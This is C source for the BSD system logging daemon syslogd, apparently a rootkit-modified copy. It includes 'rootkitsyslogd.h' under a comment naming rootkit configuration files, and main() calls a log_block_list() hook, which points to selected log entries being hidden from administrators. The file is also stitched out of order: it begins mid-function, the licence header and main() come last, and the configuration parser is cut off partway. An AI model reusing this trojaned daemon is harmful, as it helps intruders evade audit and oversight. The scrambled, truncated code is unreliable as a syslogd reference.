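			if (*p == '>')
				++p;
		} else {
			/* kernel printf's come out on console */
			flags |= IGN_CONS;
		}
		if (pri > (LOG_FACMASK|LOG_PRIMASK) ||
		    (pri &~ (LOG_FACMASK|LOG_PRIMASK)))
			pri = DEFSPRI;
		q = lp;
		while (*p != '\0' && (c = *p++) != '\n' &&
		    q < &line[MAXLINE])
			*q++ = c;
		*q = '\0';
		logmsg(pri, line, LocalHostName, flags);
	}
}

time_t	now;

/*
 * Log a message to the appropriate log files, users, etc. based on
 * the priority.
 *
 * pri   - facility and level, as decoded by LOG_FAC() / LOG_PRI().
 * msg   - message text, optionally starting with a 16-byte timestamp.
 * from  - originating host name.
 * flags - IGN_CONS, SYNC_FILE, ADDDATE, MARK.
 *
 * SIGHUP and SIGALRM are blocked for the duration of the call.
 */
void
logmsg(pri, msg, from, flags)
	int pri;
	char *msg, *from;
	int flags;
{
	struct filed *f;
	int fac, msglen, omask, prilev;
	char *timestamp;
	char prog[NAME_MAX+1];
	int i;

	dprintf("logmsg: pri %o, flags %x, from %s, msg %s\n",
	    pri, flags, from, msg);

	omask = sigblock(sigmask(SIGHUP)|sigmask(SIGALRM));

	/*
	 * Check to see if msg looks non-standard.
	 */
	msglen = strlen(msg);
	if (msglen < 16 || msg[3] != ' ' || msg[6] != ' ' ||
	    msg[9] != ':' || msg[12] != ':' || msg[15] != ' ')
		flags |= ADDDATE;

	(void)time(&now);
	if (flags & ADDDATE)
		timestamp = ctime(&now) + 4;
	else {
		/* The sender's own timestamp is kept; skip past it. */
		timestamp = msg;
		msg += 16;
		msglen -= 16;
	}

	/* skip leading blanks */
	while (isspace((unsigned char)*msg)) {
		msg++;
		msglen--;
	}

	/* extract facility and priority level */
	if (flags & MARK)
		fac = LOG_NFACILITIES;
	else
		fac = LOG_FAC(pri);
	prilev = LOG_PRI(pri);

	/* extract program name */
	for (i = 0; i < NAME_MAX; i++) {
		if (!isalnum((unsigned char)msg[i]))
			break;
		prog[i] = msg[i];
	}
	prog[i] = 0;

	/* log the message to the particular outputs */
	if (!Initialized) {
		/* No configuration loaded yet: write to the console only. */
		f = &consfile;
		f->f_file = open(ctty, O_WRONLY, 0);

		if (f->f_file >= 0) {
			fprintlog(f, flags, msg);
			(void)close(f->f_file);
		}
		(void)sigsetmask(omask);
		return;
	}
	for (f = Files; f; f = f->f_next) {
		/* skip messages that are incorrect priority */
		if (f->f_pmask[fac] < prilev ||
		    f->f_pmask[fac] == INTERNAL_NOPRI)
			continue;
		/* skip messages with the incorrect program name */
		if (f->f_program)
			if (strcmp(prog, f->f_program) != 0)
				continue;

		if (f->f_type == F_CONSOLE && (flags & IGN_CONS))
			continue;

		/* don't output marks to recently written files */
		if ((flags & MARK) && (now - f->f_time) < MarkInterval / 2)
			continue;

		/*
		 * suppress duplicate lines to this file
		 */
		if ((flags & MARK) == 0 && msglen == f->f_prevlen &&
		    !strcmp(msg, f->f_prevline) &&
		    !strcmp(from, f->f_prevhost)) {
			(void)strncpy(f->f_lasttime, timestamp, 15);
			f->f_prevcount++;
			dprintf("msg repeated %d times, %ld sec of %d\n",
			    f->f_prevcount, now - f->f_time,
			    repeatinterval[f->f_repeatcount]);
			/*
			 * If domark would have logged this by now,
			 * flush it now (so we don't hold isolated messages),
			 * but back off so we'll flush less often
			 * in the future.
			 */
			if (now > REPEATTIME(f)) {
				fprintlog(f, flags, (char *)NULL);
				BACKOFF(f);
			}
		} else {
			/* new line, save it */
			if (f->f_prevcount)
				fprintlog(f, 0, (char *)NULL);
			f->f_repeatcount = 0;
			(void)strncpy(f->f_lasttime, timestamp, 15);
			/*
			 * The host name can come from a reverse lookup (see
			 * cvthname()), so its length is not trusted: copy one
			 * byte less than the field and terminate explicitly.
			 * strncpy() alone leaves the field unterminated when
			 * the source fills it.
			 */
			(void)strncpy(f->f_prevhost, from,
			    sizeof(f->f_prevhost) - 1);
			f->f_prevhost[sizeof(f->f_prevhost) - 1] = '\0';
			if (msglen < MAXSVLINE) {
				f->f_prevlen = msglen;
				f->f_prevpri = pri;
				(void)strcpy(f->f_prevline, msg);
				fprintlog(f, flags, (char *)NULL);
			} else {
				/* Too long to remember; log it unsaved. */
				f->f_prevline[0] = 0;
				f->f_prevlen = 0;
				fprintlog(f, flags, msg);
			}
		}
	}
	(void)sigsetmask(omask);
}

/*
 * Write one message to a single destination.
 *
 * f     - destination entry; f_prevhost, f_lasttime, f_prevline and
 *         f_prevcount supply the parts that msg does not.
 * flags - IGN_CONS suppresses console output, SYNC_FILE requests fsync().
 * msg   - text to log, or NULL to log the saved line (or the "repeated"
 *         summary when f_prevcount > 1).
 *
 * A destination that fails is marked F_UNUSED.  f_prevcount is reset.
 */
void
fprintlog(f, flags, msg)
	struct filed *f;
	int flags;
	char *msg;
{
	struct iovec iov[6];
	struct iovec *v;
	int l;
	char line[MAXLINE + 1], repbuf[80], greetings[200];

	v = iov;
	if (f->f_type == F_WALL) {
		/*
		 * f_prevhost can be longer than greetings[], so the banner is
		 * formatted with a bound and the iovec length is clamped to
		 * what was actually stored.
		 */
		l = snprintf(greetings, sizeof(greetings),
		    "\r\n\7Message from syslogd@%s at %.24s ...\r\n",
		    f->f_prevhost, ctime(&now));
		if (l < 0)
			l = 0;
		else if (l >= (int)sizeof(greetings))
			l = sizeof(greetings) - 1;
		v->iov_base = greetings;
		v->iov_len = l;
		v++;
		v->iov_base = "";
		v->iov_len = 0;
		v++;
	} else {
		v->iov_base = f->f_lasttime;
		v->iov_len = 15;
		v++;
		v->iov_base = " ";
		v->iov_len = 1;
		v++;
	}
	v->iov_base = f->f_prevhost;
	v->iov_len = strlen(v->iov_base);
	v++;
	v->iov_base = " ";
	v->iov_len = 1;
	v++;

	if (msg) {
		v->iov_base = msg;
		v->iov_len = strlen(msg);
	} else if (f->f_prevcount > 1) {
		v->iov_base = repbuf;
		v->iov_len = sprintf(repbuf, "last message repeated %d times",
		    f->f_prevcount);
	} else {
		v->iov_base = f->f_prevline;
		v->iov_len = f->f_prevlen;
	}
	v++;		/* v now points at iov[5], the line terminator slot */

	dprintf("Logging to %s", TypeNames[f->f_type]);
	f->f_time = now;

	switch (f->f_type) {
	case F_UNUSED:
		dprintf("\n");
		break;

	case F_FORW:
		dprintf(" %s\n", f->f_un.f_forw.f_hname);
		/*
		 * The message alone may be MAXLINE bytes, so prefix plus
		 * message can exceed line[].  Format with a bound; the old
		 * code clamped l only after sprintf() had already written.
		 */
		l = snprintf(line, sizeof(line), "<%d>%.15s %s", f->f_prevpri,
		    iov[0].iov_base, iov[4].iov_base);
		if (l < 0)
			l = 0;
		if (l > MAXLINE)
			l = MAXLINE;
		if (sendto(finet, line, l, 0,
		    (struct sockaddr *)&f->f_un.f_forw.f_addr,
		    sizeof(f->f_un.f_forw.f_addr)) != l) {
			int e = errno;
			/*
			 * NOTE(review): cfline()'s '@' branch never assigns
			 * f_file, so this appears to close whatever value the
			 * zeroed entry holds -- confirm before relying on it.
			 */
			(void)close(f->f_file);
			f->f_type = F_UNUSED;
			errno = e;
			logerror("sendto");
		}
		break;

	case F_CONSOLE:
		if (flags & IGN_CONS) {
			dprintf(" (ignored)\n");
			break;
		}
		/* FALLTHROUGH */

	case F_TTY:
	case F_FILE:
		dprintf(" %s\n", f->f_un.f_fname);
		if (f->f_type != F_FILE) {
			v->iov_base = "\r\n";
			v->iov_len = 2;
		} else {
			v->iov_base = "\n";
			v->iov_len = 1;
		}
	again:
		if (writev(f->f_file, iov, 6) < 0) {
			int e = errno;
			(void)close(f->f_file);
			/*
			 * Check for errors on TTY's due to loss of tty
			 */
			if ((e == EIO || e == EBADF) && f->f_type != F_FILE) {
				f->f_file = open(f->f_un.f_fname,
				    O_WRONLY|O_APPEND, 0);
				if (f->f_file < 0) {
					f->f_type = F_UNUSED;
					logerror(f->f_un.f_fname);
				} else
					goto again;
			} else {
				f->f_type = F_UNUSED;
				errno = e;
				logerror(f->f_un.f_fname);
			}
		} else if (flags & SYNC_FILE)
			(void)fsync(f->f_file);
		break;

	case F_USERS:
	case F_WALL:
		dprintf("\n");
		v->iov_base = "\r\n";
		v->iov_len = 2;
		wallmsg(f, iov);
		break;
	}
	f->f_prevcount = 0;
}

/*
 *  WALLMSG -- Write a message to the world at large
 *
 *	Write the specified message to either the entire
 *	world, or a list of approved users.
 *
 *	f   - F_WALL sends to every utmp entry with a name; otherwise only
 *	      to names listed in f->f_un.f_uname.
 *	iov - six-element vector prepared by fprintlog().
 */
void
wallmsg(f, iov)
	struct filed *f;
	struct iovec *iov;
{
	static int reenter;			/* avoid calling ourselves */
	FILE *uf;
	struct utmp ut;
	int i;
	char *p;
	char line[sizeof(ut.ut_line) + 1];

	/* logerror() below can lead back here; the counter breaks the loop. */
	if (reenter++)
		return;
	if ((uf = fopen(_PATH_UTMP, "r")) == NULL) {
		logerror(_PATH_UTMP);
		reenter = 0;
		return;
	}
	/* NOSTRICT */
	while (fread((char *)&ut, sizeof(ut), 1, uf) == 1) {
		if (ut.ut_name[0] == '\0')
			continue;
		/* ut_line is copied with an explicit terminator appended. */
		strncpy(line, ut.ut_line, sizeof(ut.ut_line));
		line[sizeof(ut.ut_line)] = '\0';
		if (f->f_type == F_WALL) {
			if ((p = ttymsg(iov, 6, line, 60*5)) != NULL) {
				errno = 0;	/* already in msg */
				logerror(p);
			}
			continue;
		}
		/* should we send the message to this user? */
		for (i = 0; i < MAXUNAMES; i++) {
			if (!f->f_un.f_uname[i][0])
				break;
			if (!strncmp(f->f_un.f_uname[i], ut.ut_name,
			    UT_NAMESIZE)) {
				if ((p = ttymsg(iov, 6, line, 60*5)) != NULL) {
					errno = 0;	/* already in msg */
					logerror(p);
				}
				break;
			}
		}
	}
	(void)fclose(uf);
	reenter = 0;
}

/*
 * SIGCHLD handler: collect every exited child without blocking.
 */
void
reapchild(signo)
	int signo;
{
	union wait status;

	while (wait3((int *)&status, WNOHANG, (struct rusage *)NULL) > 0)
		;
}

/*
 * Return a printable representation of a host address.
 *
 * The name is whatever the reverse lookup returns; no forward lookup
 * confirms it, so log consumers should not treat the host field as
 * authenticated.  The returned pointer refers to storage owned by the
 * resolver or inet_ntoa(), or to a string literal.
 */
char *
cvthname(f)
	struct sockaddr_in *f;
{
	struct hostent *hp;
	char *p;

	dprintf("cvthname(%s)\n", inet_ntoa(f->sin_addr));

	if (f->sin_family != AF_INET) {
		dprintf("Malformed from address\n");
		return ("???");
	}
	hp = gethostbyaddr((char *)&f->sin_addr,
	    sizeof(struct in_addr), f->sin_family);
	if (hp == 0) {
		dprintf("Host name for your address (%s) unknown\n",
			inet_ntoa(f->sin_addr));
		return (inet_ntoa(f->sin_addr));
	}
	/* Drop the domain part when it matches our own domain. */
	if ((p = strchr(hp->h_name, '.')) && strcmp(p + 1, LocalDomain) == 0)
		*p = '\0';
	return (hp->h_name);
}

/*
 * SIGALRM handler: emit the periodic mark and flush pending
 * "last message repeated" summaries, then re-arm the timer.
 *
 * NOTE(review): this runs logmsg()/fprintlog() from signal context;
 * logmsg() blocks SIGALRM while it works, which is the only guard
 * visible here.
 */
void
domark(signo)
	int signo;
{
	struct filed *f;

	now = time((time_t *)NULL);
	MarkSeq += TIMERINTVL;
	if (MarkSeq >= MarkInterval) {
		logmsg(LOG_INFO, "-- MARK --", LocalHostName, ADDDATE|MARK);
		MarkSeq = 0;
	}

	for (f = Files; f; f = f->f_next) {
		if (f->f_prevcount && now >= REPEATTIME(f)) {
			dprintf("flush %s: repeated %d times, %d sec.\n",
			    TypeNames[f->f_type], f->f_prevcount,
			    repeatinterval[f->f_repeatcount]);
			fprintlog(f, 0, (char *)NULL);
			BACKOFF(f);
		}
	}
	(void)alarm(TIMERINTVL);
}

/*
 * Print syslogd errors some place.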
*/ void logerror(type) char *type; { char buf[100]; if (errno) (void)snprintf(buf, sizeof(buf), "syslogd: %s: %s", type, strerror(errno)); else (void)snprintf(buf, sizeof(buf), "syslogd: %s", type); errno = 0; dprintf("%s\n", buf); logmsg(LOG_SYSLOG|LOG_ERR, buf, LocalHostName, ADDDATE); } void die(signo) int signo; { struct filed *f; char buf[100]; for (f = Files; f != NULL; f = f->f_next) { /* flush any pending output */ if (f->f_prevcount) fprintlog(f, 0, (char *)NULL); } if (signo) { dprintf("syslogd: exiting on signal %d\n", signo); (void)sprintf(buf, "exiting on signal %d", signo); errno = 0; logerror(buf); } (void)unlink(LogName); exit(0); } /* * INIT -- Initialize syslogd from configuration table */ void init(signo) int signo; { int i; FILE *cf; struct filed *f, *next, **nextp; char *p; char cline[LINE_MAX]; char prog[NAME_MAX+1]; dprintf("init\n"); /* * Close all open log files. */ Initialized = 0; for (f = Files; f != NULL; f = next) { /* flush any pending output */ if (f->f_prevcount) fprintlog(f, 0, (char *)NULL); switch (f->f_type) { case F_FILE: case F_TTY: case F_CONSOLE: case F_FORW: (void)close(f->f_file); break; } next = f->f_next; if(f->f_program) free(f->f_program); free((char *)f); } Files = NULL; nextp = &Files; /* open the configuration file */ if ((cf = fopen(ConfFile, "r")) == NULL) { dprintf("cannot open %s\n", ConfFile); *nextp = (struct filed *)calloc(1, sizeof(*f)); cfline("*.ERR\t/dev/console", *nextp, "*"); (*nextp)->f_next = (struct filed *)calloc(1, sizeof(*f)); cfline("*.PANIC\t*", (*nextp)->f_next, "*"); Initialized = 1; return; } /* * Foreach line in the conf table, open that file. */ f = NULL; strcpy(prog, "*"); while (fgets(cline, sizeof(cline), cf) != NULL) { /* * check for end-of-section, comments, strip off trailing * spaces and newline character. #!prog is treated specially: * following lines apply only to that program. 
*/ for (p = cline; isspace(*p); ++p) continue; if (*p == 0) continue; if(*p == '#') { p++; if(*p!='!') continue; } if(*p=='!') { p++; while(isspace(*p)) p++; if(!*p) { strcpy(prog, "*"); continue; } for(i = 0; i < NAME_MAX; i++) { if(!isalnum(p[i])) break; prog[i] = p[i]; } prog[i] = 0; continue; } for (p = strchr(cline, '\0'); isspace(*--p);) continue; *++p = '\0'; f = (struct filed *)calloc(1, sizeof(*f)); *nextp = f; nextp = &f->f_next; cfline(cline, f, prog); } /* close the configuration file */ (void)fclose(cf); Initialized = 1; if (Debug) { for (f = Files; f; f = f->f_next) { for (i = 0; i <= LOG_NFACILITIES; i++) if (f->f_pmask[i] == INTERNAL_NOPRI) printf("X "); else printf("%d ", f->f_pmask[i]); printf("%s: ", TypeNames[f->f_type]); switch (f->f_type) { case F_FILE: case F_TTY: case F_CONSOLE: printf("%s", f->f_un.f_fname); break; case F_FORW: printf("%s", f->f_un.f_forw.f_hname); break; case F_USERS: for (i = 0; i < MAXUNAMES && *f->f_un.f_uname[i]; i++) printf("%s, ", f->f_un.f_uname[i]); break; } if(f->f_program) { printf(" (%s)", f->f_program); } printf("\n"); } } logmsg(LOG_SYSLOG|LOG_INFO, "syslogd: restart", LocalHostName, ADDDATE); dprintf("syslogd: restarted\n"); } /* * Crack a configuration file line */ void cfline(line, f, prog) char *line; struct filed *f; char *prog; { struct hostent *hp; int i, pri; char *bp, *p, *q; char buf[MAXLINE], ebuf[100]; dprintf("cfline(\"%s\", f, \"%s\")\n", line, prog); errno = 0; /* keep strerror() stuff out of logerror messages */ /* clear out file entry */ memset(f, 0, sizeof(*f)); for (i = 0; i <= LOG_NFACILITIES; i++) f->f_pmask[i] = INTERNAL_NOPRI; /* save program name if any */ if(prog && *prog=='*') prog = NULL; if(prog) { f->f_program = calloc(1, strlen(prog)+1); if(f->f_program) { strcpy(f->f_program, prog); } } /* scan through the list of selectors */ for (p = line; *p && *p != '\t';) { /* find the end of this facility name list */ for (q = p; *q && *q != '\t' && *q++ != '.'; ) continue; /* collect 
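/*
 * Decode a symbolic name to a numeric value
 *
 * name    - facility or priority name from the configuration line
 * codetab - table of { c_name, c_val } pairs ended by a NULL c_name
 *
 * A name that starts with a digit is converted with atoi() and returned
 * without any range check, so the caller has to validate the value before
 * using it as an index.  Otherwise the name is lower-cased (at most 39
 * characters are kept) and looked up in codetab.  Returns the matching
 * c_val, or -1 when the name is not in the table.
 */
int
decode(name, codetab)
	const char *name;
	CODE *codetab;
{
	CODE *c;
	char *p, buf[40];

	/*
	 * The <ctype.h> functions take an int that must be EOF or fit in an
	 * unsigned char; a plain char with the high bit set would be passed
	 * as a negative value, hence the casts.
	 */
	if (isdigit((unsigned char)*name))
		return (atoi(name));

	for (p = buf; *name && p < &buf[sizeof(buf) - 1]; p++, name++)
		*p = (char)tolower((unsigned char)*name);
	*p = '\0';

	for (c = codetab; c->c_name; c++)
		if (!strcmp(buf, c->c_name))
			return (c->c_val);

	return (-1);
}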
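/*
 * Display the contents of a uio structure on a terminal.
 *
 * iov, iovcnt - message pieces to write (at most 6 entries)
 * line        - terminal name relative to _PATH_DEV; must not contain '/'
 * tmout       - seconds the forked child may wait when the write blocks
 *
 * Returns NULL on success and for the "normal" failures (EBUSY/EACCES on
 * open, the line going away), otherwise a pointer to a static error string
 * without a trailing newline.  When the write would block, the parent
 * returns NULL and a forked child finishes the write and _exit()s.
 *
 * Changes from the original:
 *  - line is length-checked before it is appended to the static device
 *    buffer; the unbounded strcpy() could write past the end of device[].
 *  - O_NONBLOCK is cleared with F_GETFL/F_SETFL; the original passed the
 *    open(2) flag O_NONBLOCK as the fcntl() command and a pointer as its
 *    argument.
 *  - pointer arithmetic on iov_base goes through char *.
 */
char *
ttymsg(iov, iovcnt, line, tmout)
	struct iovec *iov;
	int iovcnt;
	char *line;
	int tmout;
{
	static char device[MAXNAMLEN] = _PATH_DEV;
	static char errbuf[1024];
	register int cnt, fd, left, wret;
	struct iovec localiov[6];
	size_t linelen;
	int forked = 0;

	if (iovcnt < 0 ||
	    (size_t)iovcnt > sizeof(localiov) / sizeof(localiov[0]))
		return ("too many iov's (change code in wall/ttymsg.c)");

	/* Reject names that do not fit behind the _PATH_DEV prefix. */
	linelen = strlen(line);
	if (linelen >= sizeof(device) - (sizeof(_PATH_DEV) - 1)) {
		(void) snprintf(errbuf, sizeof(errbuf),
		    "tty name too long (%lu bytes)", (unsigned long)linelen);
		return (errbuf);
	}
	memcpy(device + sizeof(_PATH_DEV) - 1, line, linelen + 1);

	if (strchr(device + sizeof(_PATH_DEV) - 1, '/')) {
		/* A slash is an attempt to break security... */
		(void) snprintf(errbuf, sizeof(errbuf), "'/' in \"%s\"",
		    device);
		return (errbuf);
	}

	/*
	 * open will fail on slip lines or exclusive-use lines
	 * if not running as root; not an error.
	 */
	if ((fd = open(device, O_WRONLY|O_NONBLOCK, 0)) < 0) {
		if (errno == EBUSY || errno == EACCES)
			return (NULL);
		(void) snprintf(errbuf, sizeof(errbuf),
		    "%s: %s", device, strerror(errno));
		return (errbuf);
	}

	for (cnt = left = 0; cnt < iovcnt; ++cnt)
		left += iov[cnt].iov_len;

	for (;;) {
		wret = writev(fd, iov, iovcnt);
		if (wret >= left)
			break;
		if (wret >= 0) {
			/* Short write: continue from a private copy of iov. */
			left -= wret;
			if (iov != localiov) {
				memcpy(localiov, iov,
				    iovcnt * sizeof(struct iovec));
				iov = localiov;
			}
			/* wret < left here, so a non-empty entry remains. */
			while ((size_t)wret >= iov->iov_len) {
				wret -= iov->iov_len;
				++iov;
				--iovcnt;
			}
			if (wret) {
				iov->iov_base = (char *)iov->iov_base + wret;
				iov->iov_len -= wret;
			}
			continue;
		}
		if (errno == EWOULDBLOCK) {
			int cpid, flags;

			if (forked) {
				(void) close(fd);
				_exit(1);
			}
			cpid = fork();
			if (cpid < 0) {
				(void) snprintf(errbuf, sizeof(errbuf),
				    "fork: %s", strerror(errno));
				(void) close(fd);
				return (errbuf);
			}
			if (cpid) {	/* parent */
				(void) close(fd);
				return (NULL);
			}
			forked++;
			/* wait at most tmout seconds */
			(void) signal(SIGALRM, SIG_DFL);
			(void) signal(SIGTERM, SIG_DFL); /* XXX */
			(void) sigsetmask(0);
			(void) alarm((unsigned int)tmout);
			/* switch the descriptor to blocking writes */
			flags = fcntl(fd, F_GETFL, 0);
			if (flags != -1)
				(void) fcntl(fd, F_SETFL, flags & ~O_NONBLOCK);
			continue;
		}
		/*
		 * We get ENODEV on a slip line if we're running as root,
		 * and EIO if the line just went away.
		 */
		if (errno == ENODEV || errno == EIO)
			break;
		(void) close(fd);
		if (forked)
			_exit(1);
		(void) snprintf(errbuf, sizeof(errbuf),
		    "%s: %s", device, strerror(errno));
		return (errbuf);
	}

	(void) close(fd);
	if (forked)
		_exit(0);
	return (NULL);
}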
Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1983, 1988, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)syslogd.c 8.3 (Berkeley) 4/4/94"; #endif /* not lint */ /* * syslogd -- log system messages * * This program implements a system log. It takes a series of lines. * Each line may have a priority, signified as "" as * the first characters of the line. If this is * not present, a default priority is used. * * To kill syslogd, send a signal 15 (terminate). 
A signal 1 (hup) will * cause it to reread its configuration file. * * Defined Constants: * * MAXLINE -- the maximimum line length that can be handled. * DEFUPRI -- the default priority for user messages * DEFSPRI -- the default priority for kernel messages * * Author: Eric Allman * extensive changes by Ralph Campbell * more extensive changes by Eric Allman (again) * Extension to log by program name as well as facility and priority * by Peter da Silva. */ #define MAXLINE 1024 /* maximum line length */ #define MAXSVLINE 120 /* maximum saved line length */ #define DEFUPRI (LOG_USER|LOG_NOTICE) #define DEFSPRI (LOG_KERN|LOG_CRIT) #define TIMERINTVL 30 /* interval for checking flush, mark */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pathnames.h" /* Rootkit configuration files */ #include "../config.h" #include "../rootkitsyslogd.h" #define SYSLOG_NAMES #include char *LogName = _PATH_LOG; char *ConfFile = _PATH_LOGCONF; char *PidFile = _PATH_LOGPID; char ctty[] = _PATH_CONSOLE; #define FDMASK(fd) (1 << (fd)) #define dprintf if (Debug) printf #define MAXUNAMES 20 /* maximum number of user names */ /* * Flags to logmsg(). */ #define IGN_CONS 0x001 /* don't print on console */ #define SYNC_FILE 0x002 /* do fsync on file after printing */ #define ADDDATE 0x004 /* add a date to the message */ #define MARK 0x008 /* this message is a mark */ /* * This structure represents the files that will have log * copies printed. 
*/ struct filed { struct filed *f_next; /* next in linked list */ short f_type; /* entry type, see below */ short f_file; /* file descriptor */ time_t f_time; /* time this was last written */ u_char f_pmask[LOG_NFACILITIES+1]; /* priority mask */ char *f_program; /* program this applies to */ union { char f_uname[MAXUNAMES][UT_NAMESIZE+1]; struct { char f_hname[MAXHOSTNAMELEN+1]; struct sockaddr_in f_addr; } f_forw; /* forwarding address */ char f_fname[MAXPATHLEN]; } f_un; char f_prevline[MAXSVLINE]; /* last message logged */ char f_lasttime[16]; /* time of last occurrence */ char f_prevhost[MAXHOSTNAMELEN+1]; /* host from which recd. */ int f_prevpri; /* pri of f_prevline */ int f_prevlen; /* length of f_prevline */ int f_prevcount; /* repetition cnt of prevline */ int f_repeatcount; /* number of "repeated" msgs */ }; /* * Intervals at which we flush out "message repeated" messages, * in seconds after previous message is logged. After each flush, * we move to the next interval until we reach the largest. 
*/ int repeatinterval[] = { 30, 120, 600 }; /* # of secs before flush */ #define MAXREPEAT ((sizeof(repeatinterval) / sizeof(repeatinterval[0])) - 1) #define REPEATTIME(f) ((f)->f_time + repeatinterval[(f)->f_repeatcount]) #define BACKOFF(f) { if (++(f)->f_repeatcount > MAXREPEAT) \ (f)->f_repeatcount = MAXREPEAT; \ } /* values for f_type */ #define F_UNUSED 0 /* unused entry */ #define F_FILE 1 /* regular file */ #define F_TTY 2 /* terminal */ #define F_CONSOLE 3 /* console terminal */ #define F_FORW 4 /* remote machine */ #define F_USERS 5 /* list of users */ #define F_WALL 6 /* everyone logged on */ char *TypeNames[7] = { "UNUSED", "FILE", "TTY", "CONSOLE", "FORW", "USERS", "WALL" }; struct filed *Files; struct filed consfile; int Debug; /* debug flag */ char LocalHostName[MAXHOSTNAMELEN+1]; /* our hostname */ char *LocalDomain; /* our local domain name */ int InetInuse = 0; /* non-zero if INET sockets are being used */ int finet; /* Internet datagram socket */ int LogPort; /* port number for INET connections */ int Initialized = 0; /* set when we have initialized ourselves */ int MarkInterval = 20 * 60; /* interval between marks in seconds */ int MarkSeq = 0; /* mark sequence number */ void cfline __P((char *, struct filed *, char *)); char *cvthname __P((struct sockaddr_in *)); int decode __P((const char *, CODE *)); void die __P((int)); void domark __P((int)); void fprintlog __P((struct filed *, int, char *)); void init __P((int)); void logerror __P((char *)); void logmsg __P((int, char *, char *, int)); void printline __P((char *, char *)); void printsys __P((char *)); void reapchild __P((int)); char *ttymsg __P((struct iovec *, int, char *, int)); void usage __P((void)); void wallmsg __P((struct filed *, struct iovec *)); int main(argc, argv) int argc; char *argv[]; { int ch, funix, i, inetm, fklog, klogm, len; struct sockaddr_un sunx, fromunix; struct sockaddr_in sin, frominet; FILE *fp; char *p, line[MSG_BSIZE + 1]; while ((ch = getopt(argc, argv, 
"df:m:p:")) != EOF) switch(ch) { case 'd': /* debug */ Debug++; break; case 'f': /* configuration file */ ConfFile = optarg; break; case 'm': /* mark interval */ MarkInterval = atoi(optarg) * 60; break; case 'p': /* path */ LogName = optarg; break; case '?': default: usage(); } if ((argc -= optind) != 0) usage(); if (!Debug) (void)daemon(0, 0); else setlinebuf(stdout); log_block_list(); consfile.f_type = F_CONSOLE; (void)strcpy(consfile.f_un.f_fname, ctty); (void)gethostname(LocalHostName, sizeof(LocalHostName)); if ((p = strchr(LocalHostName, '.')) != NULL) { *p++ = '\0'; LocalDomain = p; } else LocalDomain = ""; (void)signal(SIGTERM, die); (void)signal(SIGINT, Debug ? die : SIG_IGN); (void)signal(SIGQUIT, Debug ? die : SIG_IGN); (void)signal(SIGCHLD, reapchild); (void)signal(SIGALRM, domark); (void)alarm(TIMERINTVL); (void)unlink(LogName); #ifndef SUN_LEN #define SUN_LEN(unp) (strlen((unp)->sun_path) + 2) #endif memset(&sunx, 0, sizeof(sunx)); sunx.sun_family = AF_UNIX; (void)strncpy(sunx.sun_path, LogName, sizeof(sunx.sun_path)); funix = socket(AF_UNIX, SOCK_DGRAM, 0); if (funix < 0 || bind(funix, (struct sockaddr *)&sunx, SUN_LEN(&sunx)) < 0 || chmod(LogName, 0666) < 0) { (void) sprintf(line, "cannot create %s", LogName); logerror(line); dprintf("cannot create %s (%d)\n", LogName, errno); die(0); } finet = socket(AF_INET, SOCK_DGRAM, 0); inetm = 0; if (finet >= 0) { struct servent *sp; sp = getservbyname("syslog", "udp"); if (sp == NULL) { errno = 0; logerror("syslog/udp: unknown service"); die(0); } memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = LogPort = sp->s_port; if (bind(finet, (struct sockaddr *)&sin, sizeof(sin)) < 0) { logerror("bind"); if (!Debug) die(0); } else { inetm = FDMASK(finet); InetInuse = 1; } } if ((fklog = open(_PATH_KLOG, O_RDONLY, 0)) >= 0) klogm = FDMASK(fklog); else { dprintf("can't open %s (%d)\n", _PATH_KLOG, errno); klogm = 0; } /* tuck my process id away */ fp = fopen(PidFile, "w"); if (fp != NULL) { 
fprintf(fp, "%d\n", getpid()); (void) fclose(fp); } dprintf("off & running....\n"); init(0); (void)signal(SIGHUP, init); for (;;) { int nfds, readfds = FDMASK(funix) | inetm | klogm; dprintf("readfds = %#x\n", readfds); nfds = select(20, (fd_set *)&readfds, (fd_set *)NULL, (fd_set *)NULL, (struct timeval *)NULL); if (nfds == 0) continue; if (nfds < 0) { if (errno != EINTR) logerror("select"); continue; } dprintf("got a message (%d, %#x)\n", nfds, readfds); if (readfds & klogm) { i = read(fklog, line, sizeof(line) - 1); if (i > 0) { line[i] = '\0'; printsys(line); } else if (i < 0 && errno != EINTR) { logerror("klog"); fklog = -1; klogm = 0; } } if (readfds & FDMASK(funix)) { len = sizeof(fromunix); i = recvfrom(funix, line, MAXLINE, 0, (struct sockaddr *)&fromunix, &len); if (i > 0) { line[i] = '\0'; printline(LocalHostName, line); } else if (i < 0 && errno != EINTR) logerror("recvfrom unix"); } if (readfds & inetm) { len = sizeof(frominet); i = recvfrom(finet, line, MAXLINE, 0, (struct sockaddr *)&frominet, &len); if (i > 0) { line[i] = '\0'; printline(cvthname(&frominet), line); } else if (i < 0 && errno != EINTR) logerror("recvfrom inet"); } } } void usage() { (void)fprintf(stderr, "usage: syslogd [-f conffile] [-m markinterval] [-p logpath]\n"); exit(1); } /* * Take a raw input line, decode the message, 